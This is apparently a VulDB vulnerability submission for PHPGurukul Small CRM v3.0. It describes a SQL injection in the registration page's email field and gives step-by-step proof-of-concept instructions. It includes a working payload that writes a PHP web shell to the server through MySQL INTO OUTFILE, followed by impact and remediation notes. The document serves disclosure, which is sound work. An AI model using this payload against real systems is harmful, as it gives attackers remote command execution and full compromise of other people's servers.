Title | PHPGurukul Small CRM V 3.0 Remote Code Execution |
---|
Description | Vulnerability Description
The Registration page on Small CRM v3.0 is vulnerable to SQL injection, allowing unauthorized remote code execution (RCE) via the Outfile functionality of MySQL. This vulnerability arises from inadequate input validation in the email input field, coupled with the absence of parameterized queries.
Step by Step POC
1. Navigate to the registration page.
2. Fill out all the fields and intercept the request.
3.Send the intercepted request to the repeater.
4. Inject a SQL injection payload into the email field, observing the writing of a webshell into the filesystem for persistence mechanisms.
5. Modify the payload to access the webshell on the server and utilize it to gain complete access to the web server.
6. Access the URL associated with the generated file, triggering a Remote Code Execution.
Payload for SQLI
'+AND+1337=1337+union+all+select+"<?php+echo+shell_exec($_GET['cmd']);?>"INTO+OUTFILE+'C:\\xampp\\htdocs\\webshell.php'#
Impact
The described vulnerability and proof of concept (PoC) pose severe risks, including unauthorized access, remote code execution (RCE), system compromise.
Remediation
Implement strict input validation, use parameterized queries, provide security training. |
---|
Source | ⚠️ https://github.com/nikhil-aniill/Small-CRM-CVE |
---|
User | nanilkumar.n8197 (ID 67373) |
---|
Submission | 09/04/2024 15:17 (30 days ago) |
---|
Moderation | 12/04/2024 09:03 (3 days later) |
---|
Status | تمت الموافقة |
---|
VulDB Entry | 260480 |
---|